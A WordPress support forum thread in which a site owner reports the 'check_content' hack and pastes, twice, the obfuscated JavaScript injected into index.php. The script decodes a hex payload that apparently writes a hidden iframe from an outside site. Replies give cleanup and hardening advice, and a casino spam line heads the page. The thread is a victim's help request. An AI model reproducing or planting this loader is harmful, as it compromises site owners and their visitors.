free bonus for online casino,Is Kerri Strug still alive.REGISTER NOW GET FREE 888 PESOS REWARDS!

bonusball
(@bonusball)

14 years, 10 months ago
My blog was acting weird this afternoon. In fact it was skipping to the bottom of the page. I thought it was my browser.

I looked at the code and saw there was a broken javascript function down there.

</html><script>c46d8e='';r34077061db=document;r34077061db.write('<scr'+'ipt>function rf697c5(re40086){return e'+c46d8e+'val(re40086); }</scr'+'ipt>'); function c461134c94r11797(r864cd56e362){ var r171afc0f9=16; var d06='';return (rf697c5('pa'+d06+'rseInt')(r864cd56e362,r171afc0f9));}function rc419f0cdaed(r6dd7f24e03){ function rf59cee9(){var ra5f9b=2;return ra5f9b;} var r7aae136='';rb7d2a3653f6='fromCh';rd55dd87935=String[rb7d2a3653f6+'arCode'];for(r837a8d5035=0;r837a8d5035<r6dd7f24e03.length;r837a8d5035+=rf59cee9()){ r7aae136+=(rd55dd87935(c461134c94r11797(r6dd7f24e03.substr(r837a8d5035,rf59cee9()))));}return r7aae136;} var r4c2a3ca6ba='3C7363726970743E69662821'+c46d8e+'6D796961'+c46d8e+'297B646F63756D656E742E777269746528756E65736361'+c46d8e+'7065282027253363253639253636253732253631'+c46d8e+'253664253635253230253665253631'+c46d8e+'253664253635253364253633253334253336253230253733253732253633253364253237253638253734253734253730253361'+c46d8e+'25326625326625373425363525373225363925373325373425366625373225363925366525363325326525363325366625366425326625373425373325326625363925366525326525363325363725363925336625363325366625363425363925366526253237253262253464253631'+c46d8e+'253734253638253265253732253666253735253665253634253238253464253631'+c46d8e+'253734253638253265253732253631'+c46d8e+'253665253634253666253664253238253239253261'+c46d8e+'253334253334253337253333253239253262253237253331'+c46d8e+'253331'+c46d8e+'253632253633253339253635253332253237253230253737253639253634253734253638253364253339253230253638253635253639253637253638253734253364253334253339253337253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c46d8e+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c46d8e+'2536642536352533652729293B7D7661'+c46d8e+'72206D796961'+c46d8e+'3D747275653B3C2F7363726970743E';r34077061db.write(rc419f0cdaed(r4c2a3ca6ba));</script><script>check_content()</script>

i suspected an errant plugin. I googled and found this

https://forums.digitalpoint.com/showthread.php?t=874041

the post doesn’t make a lot of sense, but I took a peek at recently modified files on the server, and found that index.php was modified.

Sure enough:
```
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?><script>c46d8e='';r34077061db=document;r34077061db.write('<scr'+'ipt>function rf697c5(re40086){return e'+c46d8e+'val(re40086); }</scr'+'ipt>');  function c461134c94r11797(r864cd56e362){ var r171afc0f9=16; var d06='';return (rf697c5('pa'+d06+'rseInt')(r864cd56e362,r171afc0f9));}function rc419f0cdaed(r6dd7f24e03){ function rf59cee9(){var ra5f9b=2;return ra5f9b;} var r7aae136='';rb7d2a3653f6='fromCh';rd55dd87935=String[rb7d2a3653f6+'arCode'];for(r837a8d5035=0;r837a8d5035<r6dd7f24e03.length;r837a8d5035+=rf59cee9()){ r7aae136+=(rd55dd87935(c461134c94r11797(r6dd7f24e03.substr(r837a8d5035,rf59cee9()))));}return r7aae136;} var r4c2a3ca6ba='3C7363726970743E69662821'+c46d8e+'6D796961'+c46d8e+'297B646F63756D656E742E777269746528756E65736361'+c46d8e+'7065282027253363253639253636253732253631'+c46d8e+'253664253635253230253665253631'+c46d8e+'253664253635253364253633253334253336253230253733253732253633253364253237253638253734253734253730253361'+c46d8e+'25326625326625373425363525373225363925373325373425366625373225363925366525363325326525363325366625366425326625373425373325326625363925366525326525363325363725363925336625363325366625363425363925366526253237253262253464253631'+c46d8e+'253734253638253265253732253666253735253665253634253238253464253631'+c46d8e+'253734253638253265253732253631'+c46d8e+'253665253634253666253664253238253239253261'+c46d8e+'253334253334253337253333253239253262253237253331'+c46d8e+'253331'+c46d8e+'253632253633253339253635253332253237253230253737253639253634253734253638253364253339253230253638253635253639253637253638253734253364253334253339253337253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c46d8e+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c46d8e+'2536642536352533652729293B7D7661'+c46d8e+'72206D796961'+c46d8e+'3D747275653B3C2F7363726970743E';r34077061db.write(rc419f0cdaed(r4c2a3ca6ba));</script><script>check_content()</script>
```
I replaced the header, but does anyone know how this might have happened, or how I can prevent it?

Viewing 8 replies - 1 through 8 (of 8 total)

Thread Starter bonusball
(@bonusball)

14 years, 10 months ago

I also see he’s been in

/wp-content/index.php

Thread Starter bonusball
(@bonusball)

14 years, 10 months ago

also wp-admin/index.php

Has anyone else ever seen this hack?

prettyboymp
(@prettyboymp)

14 years, 10 months ago

Can you provide a list of plugins your running and who your hosting provider is?

Rev. Voodoo
(@rvoodoo)

14 years, 10 months ago

that looks like a hack to me!

https://codex.www.ads-software.com/FAQ_My_site_was_hacked
https://ocaoimh.ie/did-your-wordpress-site-get-hacked/
https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
And when you’re done:
https://codex.www.ads-software.com/Hardening_WordPress

all good reading there. Seems lately, a lot of people have been having rogue files loaded to their server that allows writing to WP file.

Best way to fin the files is with your access logs (hopefully you have access to them or can talk to your host)

Find an altered file. Note the timestamp. Check your access logs for the time/date that the file was altered. See what file is accessing the altered file. Delete it.

Also follow all the cleaning steps. Change your passwords after all is clean. ALL passwords. site/db/ftp

Thread Starter bonusball
(@bonusball)

14 years, 10 months ago

Thanks. It happened again this morning, I am trying to clean this up.

Rev. Voodoo
(@rvoodoo)

14 years, 10 months ago

yup….you have to find the source…or it’s just gonna keep coming back..

Good luck! I hated going through that

Thread Starter bonusball
(@bonusball)

14 years, 9 months ago

I have a few blogs hosted on my server, 2 or 3 of them were hacked this way.

Here’s a great post about what to do when it happens:

https://www.snipe.net/2010/01/when-wordpress-gets-hacked/

Rev. Voodoo
(@rvoodoo)

14 years, 9 months ago

that is a pretty good link…bookmarked!

Viewing 8 replies - 1 through 8 (of 8 total)

The topic ‘the “check_content” hack’ is closed to new replies.

the “check_content” hack

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics